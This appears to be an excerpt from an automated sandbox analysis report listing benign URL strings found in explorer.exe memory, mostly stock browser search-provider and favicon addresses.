Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2149428325.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2347213984.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2140719806.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2154967477.000000000856E000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2154697254.00000000082FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
